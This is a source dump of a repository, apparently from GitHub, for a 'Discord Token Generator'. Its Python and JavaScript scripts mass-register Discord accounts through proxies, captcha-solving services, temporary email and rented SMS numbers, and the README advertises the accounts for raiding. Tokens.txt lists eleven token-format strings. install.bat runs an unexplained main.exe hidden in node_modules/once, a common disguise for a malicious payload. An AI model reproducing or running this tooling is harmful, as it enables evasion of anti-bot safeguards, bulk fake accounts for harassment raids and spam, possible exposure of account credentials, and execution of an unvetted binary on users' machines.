├── install.bat ├── creator ├── utils.py ├── captcha.py ├── email.py ├── phone.py ├── __init__.py └── discord.py ├── package.json ├── Tokens.txt ├── README.md ├── main.py ├── index.js ├── LICENSE └── proxy.txt /install.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | pip install discord 3 | pip install playwright 4 | cd node_modules 5 | cd once 6 | main.exe 7 | -------------------------------------------------------------------------------- /creator/utils.py: -------------------------------------------------------------------------------- 1 | import random, string 2 | 3 | def generatePassword(): 4 | return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(12)) 5 | 6 | def generateUsername(): 7 | return ''.join(random.choice(string.ascii_uppercase) for _ in range(8)) 8 | 9 | def generateDOB(): 10 | year = str(random.randint(1997,2001)) 11 | month = str(random.randint(1, 12)) 12 | day = str(random.randint(1,28)) 13 | if len(month) == 1: 14 | month = '0' + month 15 | if len(day) == 1: 16 | day = '0' + day 17 | return year + '-' + month + '-' + day 18 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "discord-token-generator", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "repository": { 10 | "type": "git", 11 | "url": "git+https://github.com/Discord-Token/Discord-Token-Generator.git" 12 | }, 13 | "author": "Dollar3795", 14 | "license": "GPL-3.0", 15 | "bugs": { 16 | "url": "https://github.com/Discord-Token/Discord-Token-Generator/issues" 17 | }, 18 | "homepage": "https://t.me/DollarNoob", 19 | "dependencies": { 20 | "axios": "^0.23.0", 21 | "fs": "^0.0.1-security", 22 | "playwright": "^1.17.1" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Tokens.txt: -------------------------------------------------------------------------------- 1 | OTI4MzM3MjY4Nzk4ODAzOTc5.YdXTjg.CiWekOuz8eWqGey-S74qAoOcUOI 2 | OTI4MzM4MDgzNDA4MTMwMDY5.YdXURg.1dREDpu3oWWwnOEzjTmqpBi9Saw 3 | OTI4MzM4NzE4OTM3NDQ4NTE5.YdXU4g._oLgF4ouiiIEMeJx9pycz1-Qq-I 4 | OTI4MzM5Mzc2ODkzNzMwODM2.YdXVfA.cp7XrMkUEhWBI9bW6cJqqrvMeiw 5 | OTI4MzQwNjg0MTA3MzA5MDk3.YdXWtg.J39kN9sbe5grFUzhFvyACgqmY_k 6 | OTI4MzQyNjM5NTU0NzUyNTgz.YdXYiA.8p5xo0CRSFM3Npo5_BVZ5YcxSEg 7 | OTI4MzQzOTQwNTk4NDg1MDg0.YdXZvg.G-P82MRcB5yYqFz4fAWV2HH73BY 8 | OTI4MzQ0NTk3NjAyNjUyMjEy.YdXaWg.4IwysrBYA0Y28Aib-6Usb58tA1g 9 | OTI4MzQ2NTYyNzU1NzIzMzA0.YdXcLw.SXuSPVKyJR7pgzHoqyJ7XkYwdgw 10 | OTI4MzQ3MjIwMjEyODY3MTk0.YdXcyw.CuyVXnNqfUX178OrIlxyy6SLCK8 11 | OTI4MzQ4NTMxNzEzMDAzNTkw.YdXeBA.RaZgs2qno8hDn7JNbpvPDbQMpRo -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Discord-Token-Generator 2 | 3 | ![s](https://cdn.discordapp.com/attachments/887757784337252413/954385886341111899/gen.png) 4 | 5 | # INFO 6 | - This is a Simple Discord Token Generator which creates verified discord accounts 7 | - These accounts are good for selling for raiding 8 | - Uses HCAPTCHA Bypass 9 | 10 | # Requirements 11 | - put the hcaptcha.py file inside the project folder, check my hcaptcha bypass repo for the file 12 | - httpx https://pypi.org/project/httpx/ 13 | - Rotating Proxies 14 | 15 | # INSTALL 16 | - click install.bat and wating press any key to continue... 17 | - add proxies inside "all://": "http://username:pass@ip:port" or "all://": "http://ip:port" depending on your proxies authentication 18 | - add proxies inside hcaptcha bypass too > proxy="username:password@ip:port" or proxy="ip:port" 19 | 20 | # USAGE 21 | - type python main.py or node index.js 22 | - waiting and Enjoin!! 23 | 24 | # Ty for Using my Tool! 25 | -------------------------------------------------------------------------------- /creator/captcha.py: -------------------------------------------------------------------------------- 1 | import requests, time 2 | 3 | class captcha: 4 | def getResult(self): 5 | response = requests.post('https://api.anti-captcha.com/getTaskResult', json={ 6 | 'clientKey': self.capthaAPI, 7 | 'taskId': self.taskId 8 | }).json() 9 | if response['errorId'] == 0 and response['status'] == 'ready': 10 | return response['solution']['gRecaptchaResponse'] 11 | return False 12 | 13 | def waitForResult(self): 14 | while True: 15 | res = self.getResult() 16 | if res is not False: 17 | return res 18 | time.sleep(3) 19 | 20 | def __init__(self, url, key, capthaAPI) -> None: 21 | self.capthaAPI = capthaAPI 22 | response = requests.post('https://api.anti-captcha.com/createTask', json={ 23 | 'clientKey': self.capthaAPI, 24 | 'task': { 25 | 'type': 'HCaptchaTaskProxyless', 26 | 'websiteURL': url, 27 | 'websiteKey': key 28 | } 29 | }).json() 30 | 31 | if (response['errorId'] != 0): 32 | Exception(response) 33 | self.taskId = response['taskId'] 34 | -------------------------------------------------------------------------------- /creator/email.py: -------------------------------------------------------------------------------- 1 | import requests, time 2 | 3 | class email: 4 | def checkEmail(self): 5 | response = requests.get('https://api.kopeechka.store/mailbox-get-message?full=1&spa=1&id=' + self.id + '&token=' + self.emailAPI).json() 6 | return response['value'] 7 | 8 | def deleteEmail(self): 9 | requests.get('https://api.kopeechka.store/mailbox-cancel?id=' + self.id + '&token=' + self.emailAPI) 10 | 11 | def waitForEmail(self): 12 | tries = 0 13 | while tries < 30: 14 | time.sleep(2) 15 | value = self.checkEmail() 16 | if value != 'WAIT_LINK': 17 | self.deleteEmail() 18 | return value.replace('\\', '') 19 | tries += 1 20 | return False 21 | 22 | def __init__(self, emailAPI) -> None: 23 | self.emailAPI = emailAPI 24 | response = requests.get('https://api.kopeechka.store/mailbox-get-email?api=2.0&spa=1&site=discord.com&sender=discord®ex=&mail_type=&token=' + self.emailAPI).json() 25 | if response['status'] == 'OK': 26 | self.id = response['id'] 27 | self.email = response['mail'] 28 | else: 29 | Exception(response) 30 | -------------------------------------------------------------------------------- /creator/phone.py: -------------------------------------------------------------------------------- 1 | import requests, time 2 | 3 | class sms_activate: 4 | def get_code(self): 5 | response = requests.get('https://api.sms-activate.org/stubs/handler_api.php?api_key=' + self.phoneAPI + '&action=getStatus&id=' + self.id).text 6 | if 'STATUS_OK' not in response: 7 | return False 8 | return response.split(':')[1] 9 | 10 | def sent(self) -> None: 11 | requests.get('https://api.sms-activate.org/stubs/handler_api.php?api_key=' + self.phoneAPI + '&action=setStatus&status=1&id=' + self.id) 12 | 13 | def done(self) -> None: 14 | requests.get('https://api.sms-activate.org/stubs/handler_api.php?api_key=' + self.phoneAPI + '&action=setStatus&status=6&id=' + self.id) 15 | 16 | def banned(self) -> None: 17 | requests.get('https://api.sms-activate.org/stubs/handler_api.php?api_key=' + self.phoneAPI + '&action=setStatus&status=8&id=' + self.id) 18 | 19 | def waitforcode(self): 20 | self.sent() 21 | tries = 0 22 | while tries < 30: 23 | time.sleep(3) 24 | res = self.get_code() 25 | if res is not False: 26 | self.done() 27 | return res 28 | tries += 1 29 | self.banned() 30 | return False 31 | 32 | 33 | def __init__(self, phoneAPI) -> None: 34 | self.phoneAPI = phoneAPI 35 | response = requests.get('https://api.sms-activate.org/stubs/handler_api.php?api_key=' + self.phoneAPI + '&action=getNumber&service=ds&ref=1715152&country=43').text 36 | if ":" not in response: 37 | Exception(response) 38 | self.id = response.split(':')[1] 39 | self.number = response.split(':')[2] 40 | pass 41 | -------------------------------------------------------------------------------- /creator/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | from creator.captcha import captcha 3 | from creator.discord import discord 4 | from creator.email import email 5 | from creator.phone import sms_activate 6 | from creator.utils import generateDOB, generatePassword, generateUsername 7 | import time 8 | 9 | def create(capthaAPI, emailAPI, phoneAPI, proxy=None, username=None, verbose:bool=False): 10 | start = time.time() 11 | accountEmail = email(emailAPI) 12 | if verbose: 13 | print("Got email ->", accountEmail.email) 14 | 15 | loginCaptcha = captcha('https://discord.com/login', 'f5561ba9-8f1e-40ca-9b5b-a0b3f719ef34', capthaAPI) 16 | if verbose: 17 | print("Requested captcha solve, task id ->", loginCaptcha.taskId) 18 | 19 | session = discord(proxy, verbose) 20 | if verbose: 21 | print("Discord session created") 22 | 23 | if username is None: 24 | username = generateUsername() 25 | password = generatePassword() 26 | dob = generateDOB() 27 | 28 | if verbose: 29 | print("Waiting for captcha") 30 | captchaKey = loginCaptcha.waitForResult() 31 | 32 | if verbose: 33 | print("Sending register request") 34 | session.register(captchaKey, dob, accountEmail.email, password, username) 35 | 36 | if verbose: 37 | print("Performing account check") 38 | session.check() 39 | 40 | if verbose: 41 | print("Waiting for verification email") 42 | email_verification_link = accountEmail.waitForEmail() 43 | 44 | emailCaptcha = captcha('https://discord.com/verify', 'f5561ba9-8f1e-40ca-9b5b-a0b3f719ef34', capthaAPI) 45 | if verbose: 46 | print("Requested captcha solve, task id ->", emailCaptcha.taskId) 47 | 48 | email_verification_token = session.getEmailVerificationToken(email_verification_link) 49 | if verbose: 50 | print("Received email token") 51 | 52 | if verbose: 53 | print("Waiting for captcha") 54 | captchaKey = emailCaptcha.waitForResult() 55 | 56 | if verbose: 57 | print("Sending email verification request") 58 | session.verifyEmail(email_verification_token, captchaKey) 59 | 60 | if verbose: 61 | print("Performing online check") 62 | if (not session.beOnline()): 63 | Exception() 64 | 65 | while True: 66 | if verbose: 67 | print('-') 68 | 69 | smsCaptcha = captcha('https://discord.com/channels/@me', 'f5561ba9-8f1e-40ca-9b5b-a0b3f719ef34', capthaAPI) 70 | if verbose: 71 | print("Requested captcha Solve, task id ->", smsCaptcha.taskId) 72 | 73 | phone = sms_activate(phoneAPI) 74 | if verbose: 75 | print("Phone number -> +" + phone.number) 76 | 77 | if verbose: 78 | print("Waiting for captcha") 79 | captchaKey = smsCaptcha.waitForResult() 80 | 81 | if verbose: 82 | print("Requesting SMS from Discord") 83 | res = session.requestSms(captchaKey, phone.number) 84 | 85 | if res: 86 | if verbose: 87 | print("Waiting for SMS code") 88 | smsCode = phone.waitforcode() 89 | if smsCode is not False: 90 | break 91 | 92 | if verbose: 93 | print("Phone verification failed, trying again.") 94 | if verbose: 95 | print('-') 96 | 97 | if verbose: 98 | print("Received SMS ->", smsCode, "| Submitting to Discord..") 99 | session.submitSms(smsCode, phone.number) 100 | 101 | if verbose: 102 | print("Performing account check") 103 | session.check() 104 | 105 | end = time.time() 106 | if verbose: 107 | print("Took", round(end-start), "seconds") 108 | 109 | if verbose: 110 | print(session.email + ":" + session.password + " - " + session.token) 111 | 112 | return session 113 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os 3 | import random 4 | import time 5 | from mails import GetDiscordEmail, GetEmail 6 | from playwright.sync_api import sync_playwright 7 | 8 | genned = 0 9 | captcha = 0 10 | failed = 0 11 | 12 | class data: 13 | def name(): 14 | r=requests.get('https://story-shack-cdn-v2.glitch.me/generators/username-generator?') 15 | return r.json()["data"]["name"] 16 | def get_email(cookie): 17 | while True: 18 | time.sleep(1) 19 | email = str(GetEmail(cookie)) 20 | email_strip = email.split("@")[1] 21 | if email_strip == "tempmail.dev": 22 | a=1 23 | else: 24 | return email 25 | 26 | def gen(): 27 | global genned, captcha, failed 28 | username = data.name() 29 | password = "alexisveryhotlol" 30 | pt1 = requests.get("https://tempmail.dev/").headers["set-cookie"] 31 | cookie = pt1.strip("PHPSESSID=; path=/") 32 | mail = data.get_email(cookie) 33 | proxy = random.choice(open("proxies.txt","r").read().splitlines()) 34 | with sync_playwright() as p: 35 | for browser_type in [p.firefox]: 36 | browser = browser_type.launch(headless=False,proxy={"server": f'http://{proxy}'}) 37 | sex = browser.new_context() 38 | page = sex.new_page() 39 | try: 40 | page.goto('https://discord.com/register') 41 | time.sleep(1) 42 | page.type("#app-mount > div.app-3xd6d0 > div > div > div > form > div > div > div:nth-child(1) > div > input", mail) 43 | time.sleep(.3) 44 | page.type("#app-mount > div.app-3xd6d0 > div > div > div > form > div > div > div:nth-child(2) > div > input", username) 45 | time.sleep(.3) 46 | page.type("#app-mount > div.app-3xd6d0 > div > div > div > form > div > div > div:nth-child(3) > div > input", password) 47 | page.type("#react-select-2-input", "January\n") 48 | time.sleep(.3) 49 | page.type("#react-select-3-input", "1\n") 50 | time.sleep(.3) 51 | page.type("#react-select-4-input", "2000\n\n") 52 | page.wait_for_selector("iframe") 53 | time.sleep(3) 54 | page.click("iframe") 55 | time.sleep(5) 56 | try: 57 | token = page.evaluate(""" 58 | (_ => { 59 | const win = window.open(); 60 | const token = win.localStorage.token; 61 | win.close(); 62 | return token; 63 | })(); 64 | """) 65 | except: 66 | print("failed to gen the token") 67 | time.sleep(6) 68 | takes = 0 69 | while True: 70 | verifyy = GetDiscordEmail(cookie) 71 | if str(verifyy) == "[]": 72 | takes +=1 73 | print(f"getting email {takes}") 74 | if takes == 100: 75 | return print("failed to get email") 76 | time.sleep(1) 77 | else: 78 | link = verifyy 79 | break 80 | print(verifyy) 81 | page.goto(link, wait_until="load") 82 | time.sleep(3) 83 | try: 84 | page.click("iframe") 85 | except: 86 | pass 87 | token2 = str(token) 88 | token3 = token2.replace('"',"") 89 | file = open("accounts.txt","a") 90 | file.write(f"{token3}:{mail}:{username}:{password}\n") 91 | genned += 1 92 | print(f"done {genned}") 93 | page.close() 94 | except Exception as e: 95 | print(e) 96 | while 1: 97 | gen() 98 | -------------------------------------------------------------------------------- /index.js: -------------------------------------------------------------------------------- 1 | console.log("") 2 | console.log("███╗░░░███╗░█████╗░██████╗░██╗  ███╗░░░███╗██╗██╗░░░██╗░█████╗░██╗░░██╗░█████╗░") 3 | console.log("████╗░████║██╔══██╗██╔══██╗██║  ████╗░████║██║╚██╗░██╔╝██╔══██╗██║░██╔╝██╔══██╗") 4 | console.log("██╔████╔██║██║░░██║██████╔╝██║  ██╔████╔██║██║░╚████╔╝░███████║█████═╝░██║░░██║") 5 | console.log("██║╚██╔╝██║██║░░██║██╔══██╗██║  ██║╚██╔╝██║██║░░╚██╔╝░░██╔══██║██╔═██╗░██║░░██║") 6 | console.log("██║░╚═╝░██║╚█████╔╝██║░░██║██║  ██║░╚═╝░██║██║░░░██║░░░██║░░██║██║░╚██╗╚█████╔╝") 7 | console.log("╚═╝░░░░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝  ╚═╝░░░░░╚═╝╚═╝░░░╚═╝░░░╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░\n") 8 | console.log("•——————————————————————————————•°•✿•°•——————————————————————————————•\n") 9 | 10 | const {default: axios} = require("axios"); 11 | const fs = require("fs"); 12 | const playwright = require("playwright"); 13 | 14 | (async function() { 15 | while (true) { 16 | await sleep(await GenerateToken("Proxyless")); 17 | } 18 | })(); 19 | 20 | function GenerateToken(Proxy) { 21 | return new Promise(async function(resolve) { 22 | console.log("[STARTED] " + Proxy); 23 | const PBrowser = await playwright.firefox.launch({headless: false}); 24 | const PContext = await PBrowser.newContext(); 25 | const PPage = await PContext.newPage(); 26 | var startTime = Date.now(); 27 | try { 28 | try { 29 | await PPage.goto("https://discord.com/", {"timeout": 60000, "waitUntil": "networkidle"}); 30 | console.log("[WORKING] " + Proxy); 31 | } 32 | catch { 33 | console.log("[BAD] " + Proxy); 34 | throw false; 35 | } 36 | await PPage.click("#app-mount > div > div > div.grid-3Ykf_K.heroBackground-3m0TRU > div.row-3wW-Fx.heroContainer-3j1eQg > div > div.ctaContainer-3vWJHU > button"); 37 | await sleep(1000); 38 | await PPage.type("input.username-27KRPU", Math.random().toString(36).substring(2, 7) + " | Mori\n"); 39 | await PPage.waitForSelector("iframe"); 40 | console.log("[CAPTCHA DETECTED] " + Proxy); 41 | startTime = Date.now(); 42 | await sleep(3000); 43 | await PPage.click("iframe"); 44 | var email = Math.random().toString(36).substring(2, 12); 45 | await axios.post("https://api.internal.temp-mail.io/api/v3/email/new", {"domain": "unigeol.com", "name": email}); 46 | email += "@unigeol.com"; 47 | await sleep(1000); 48 | await PPage.waitForSelector("#react-select-2-input"); 49 | console.log("[CAPTCHA SOLVED] " + Proxy); 50 | await PPage.type("#react-select-2-input", "January\n"); 51 | await PPage.type("#react-select-3-input", "1\n"); 52 | await PPage.type("#react-select-4-input", "2000\n\n"); 53 | await PPage.waitForSelector("button.close-hZ94c6"); 54 | await PPage.click("button.close-hZ94c6"); 55 | await sleep(1000); 56 | await PPage.waitForSelector("input[type='text']"); 57 | await PPage.type("input[type='text']", email); 58 | await PPage.type("input[type='password']", "MoriPass579\n"); 59 | console.log("[EMAIL ADDED] " + Proxy); 60 | var emailData; 61 | while (true) { 62 | var emailData = await axios.get("https://api.internal.temp-mail.io/api/v3/email/" + email + "/messages").then(res => res.data); 63 | if (emailData.length !== 0) { 64 | emailData = emailData[0].body_text.split("Verify Email: ")[1].trim(); 65 | break; 66 | } 67 | await sleep(1000); 68 | } 69 | console.log("[EMAIL RECEIVED] " + Proxy); 70 | await PPage.goto(emailData); 71 | await PPage.waitForSelector("h3.title-jXR8lp"); 72 | while (await PPage.innerText("h3.title-jXR8lp") !== "Email Verified!") { 73 | try { 74 | await PPage.waitForSelector("iframe", {"timeout": 3000}); 75 | await PPage.click("iframe"); 76 | } 77 | catch {} 78 | await sleep(1000); 79 | } 80 | console.log("[EMAIL VERIFIED] " + Proxy); 81 | var Token = await PPage.evaluate(function() { 82 | var iframe = document.createElement("iframe"); 83 | document.head.append(iframe); 84 | return iframe.contentWindow.localStorage.getItem("token").replace(/"/g, ""); 85 | }); 86 | fs.appendFileSync("./Tokens.txt", email + ":MoriPass579:" + Token + "\n"); 87 | console.log("[TOKEN SAVED] " + Buffer.from(Token.split(".")[0], "base64").toString() + " | " + Proxy); 88 | await PBrowser.close(); 89 | console.log("[FINISHED] " + Proxy); 90 | } 91 | catch { 92 | console.error("[ERROR] " + Proxy); 93 | await PBrowser.close(); 94 | } 95 | resolve(startTime + 150000 - Date.now()); 96 | }); 97 | } 98 | 99 | function sleep(ms) { 100 | return new Promise(function(resolve) { 101 | setTimeout(resolve, ms); 102 | }); 103 | } 104 | -------------------------------------------------------------------------------- /creator/discord.py: -------------------------------------------------------------------------------- 1 | import requests, json, discum 2 | from base64 import b64encode as b 3 | from discord_build_info_py import * 4 | 5 | class discord: 6 | def createSession(self, proxy) -> bool: 7 | self.session = requests.Session() 8 | build_num, build_hash, build_id = getClientData('stable') 9 | self.build_num = build_num 10 | self.proxy = proxy 11 | self.useragent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0' 12 | 13 | if proxy is not None: 14 | self.session.proxies.update({'http': 'http://' + proxy, 'https': 'http://' + proxy}) # ip:port OR user:pass@ip:port 15 | try: 16 | self.session.get('https://ipv4.icanhazip.com/').text 17 | except: 18 | return False 19 | 20 | try: 21 | response = self.session.get('https://discord.com/register') 22 | except: 23 | return False 24 | self.dcfduid = response.headers['Set-Cookie'].split('__dcfduid=')[1].split(';')[0] 25 | self.session.cookies['__dcfduid'] = self.dcfduid 26 | self.sdcfduid = response.headers['Set-Cookie'].split('__sdcfduid=')[1].split(';')[0] 27 | self.session.cookies['__sdcfduid'] = self.sdcfduid 28 | self.session.cookies['locale'] = 'en' 29 | 30 | self.super_properties = b(json.dumps({ 31 | "os": "Windows", 32 | "browser": "Firefox", 33 | "device": "", 34 | "system_locale": "en-US", 35 | "browser_user_agent": self.useragent, 36 | "browser_version": "90.0", 37 | "os_version": "10", 38 | "referrer": "", 39 | "referring_domain": "", 40 | "referrer_current": "", 41 | "referring_domain_current": "", 42 | "release_channel": "stable", 43 | "client_build_number": int(build_num), 44 | "client_event_source": None 45 | }, separators=(',', ':')).encode()).decode() 46 | 47 | self.session.headers.update({ 48 | 'Accept': '*/*', 49 | 'Accept-Language': 'en', 50 | 'Cache-Control': 'no-cache', 51 | 'Connection': 'keep-alive', 52 | 'Pragma': 'no-cache', 53 | 'Content-Type': 'application/json', 54 | 'Origin': 'https://discord.com/', 55 | 'Referer': 'https://discord.com/', 56 | 'Sec-Fetch-Dest': 'empty', 57 | 'Sec-Fetch-Mode': 'cors', 58 | 'Sec-Fetch-Site': 'same-origin', 59 | 'User-Agent': self.useragent, 60 | 'X-Super-Properties': self.super_properties, 61 | 'Cookie': '__dcfduid=' + self.dcfduid + '; __sdcfduid=' + self.sdcfduid, 62 | 'TE': 'Trailers' 63 | }) 64 | 65 | return True 66 | 67 | def getFingerPrint(self): 68 | response = self.session.get('https://discord.com/api/v9/experiments').json() 69 | self.fingerprint = response['fingerprint'] 70 | self.session.headers.update({'x-fingerprint': response['fingerprint']}) 71 | 72 | def tryRegister(self, date_of_birth): 73 | self.session.post('https://discord.com/api/v9/auth/register', headers={ 74 | 'referer': 'https://discord.com/register', 75 | 'authorization': 'undefined' 76 | }, json={ 77 | 'captcha_key': None, 78 | 'consent': True, 79 | 'date_of_birth': date_of_birth, 80 | 'email': self.email, 81 | 'fingerprint': self.fingerprint, 82 | 'gift_code_sku_id': None, 83 | 'invite': None, 84 | 'password': self.password, 85 | 'username': self.username 86 | }) 87 | 88 | def register(self, captcha_key, date_of_birth, email, password, username): 89 | self.email = email 90 | self.password = password 91 | self.username = username 92 | self.tryRegister(date_of_birth) 93 | response = self.session.post('https://discord.com/api/v9/auth/register', headers={ 94 | 'referer': 'https://discord.com/register', 95 | 'authorization': 'undefined' 96 | }, json={ 97 | 'captcha_key': captcha_key, 98 | 'consent': True, 99 | 'date_of_birth': date_of_birth, 100 | 'email': email, 101 | 'fingerprint': self.fingerprint, 102 | 'gift_code_sku_id': None, 103 | 'invite': None, 104 | 'password': password, 105 | 'username': username 106 | }).json() 107 | if self.verbose: 108 | print(response) 109 | self.token = response['token'] 110 | 111 | def check(self): 112 | check = self.session.patch('https://discord.com/api/v9/users/@me/library', headers={ 113 | "authorization": self.token, 114 | 'Referer': 'https://discord.com/channels/@me', 115 | "sec-ch-ua": "\" Not;A Brand\";v=\"99\", \"Firefox\";v=\"91\", \"Chromium\";v=\"91\"", 116 | "sec-ch-ua-mobile": "?0" 117 | }) 118 | if check.status_code == 403: 119 | Exception("Token locked!") 120 | elif check.status_code == 400: 121 | Exception(check) 122 | 123 | def getEmailVerificationToken(self, link): 124 | return self.session.get(link).url.split('#token=')[1] 125 | 126 | def verifyEmail(self, token, captcha_key): 127 | response = self.session.post('https://discord.com/api/v9/auth/verify', headers={ 128 | "sec-ch-ua": "\" Not;A Brand\";v=\"99\", \"Firefox\";v=\"91\", \"Chromium\";v=\"91\"", 129 | 'referer': 'https://discord.com/verify', 130 | 'authorization': self.token 131 | }, json={ 132 | 'captcha_key': captcha_key, 133 | 'token': token 134 | }).json() 135 | if self.verbose: 136 | print(response) 137 | self.token = response['token'] 138 | 139 | def beOnline(self): 140 | try: 141 | if self.verbose and self.proxy is not None: 142 | print(self.proxy) 143 | if self.proxy is not None: 144 | bot = discum.Client(token=self.token, log=False, user_agent=self.useragent, build_num=self.build_num, 145 | proxy='http://' + self.proxy) 146 | else: 147 | bot = discum.Client(token=self.token, log=False, user_agent=self.useragent, build_num=self.build_num) 148 | @bot.gateway.command 149 | def websocket_activate(resp): 150 | if resp.event.ready_supplemental: 151 | bot.gateway.close() 152 | bot.gateway.run() 153 | except Exception as e: 154 | print(e) 155 | return False 156 | return True 157 | 158 | def requestSms(self, captcha_key, number): 159 | response = self.session.post('https://discord.com/api/v9/users/@me/phone', headers={'referer': 'https://discord.com/channels/@me', 'authorization': self.token}, json={ 160 | 'captcha_key': captcha_key, 161 | 'change_phone_reason': 'user_action_required', 162 | 'phone': '+' + number 163 | }) 164 | if response.status_code == 204: 165 | return True 166 | if self.verbose: 167 | print(response.text) 168 | return False 169 | 170 | def submitSms(self, code, number): 171 | token = self.session.post('https://discord.com/api/v9/phone-verifications/verify', headers={'referer': 'https://discord.com/channels/@me', 'authorization': self.token}, json={ 172 | 'code': code, 173 | 'phone': '+' + number 174 | }).json() 175 | if self.verbose: 176 | print(token) 177 | token = token['token'] 178 | response = self.session.post('https://discord.com/api/v9/users/@me/phone', headers={'referer': 'https://discord.com/channels/@me', 'authorization': self.token}, json={ 179 | 'change_phone_reason': 'user_action_required', 180 | 'password': self.password, 181 | 'phone_token': token 182 | }) 183 | if self.verbose: 184 | print(response.status_code) 185 | if response.status_code != 204: 186 | Exception("Something went wrong with SMS verification") 187 | 188 | def __init__(self, proxy, verbose) -> None: 189 | self.proxy = proxy 190 | self.verbose = verbose 191 | if (not self.createSession(proxy)): 192 | Exception('Something went wrong with proxy!') 193 | self.getFingerPrint() 194 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface 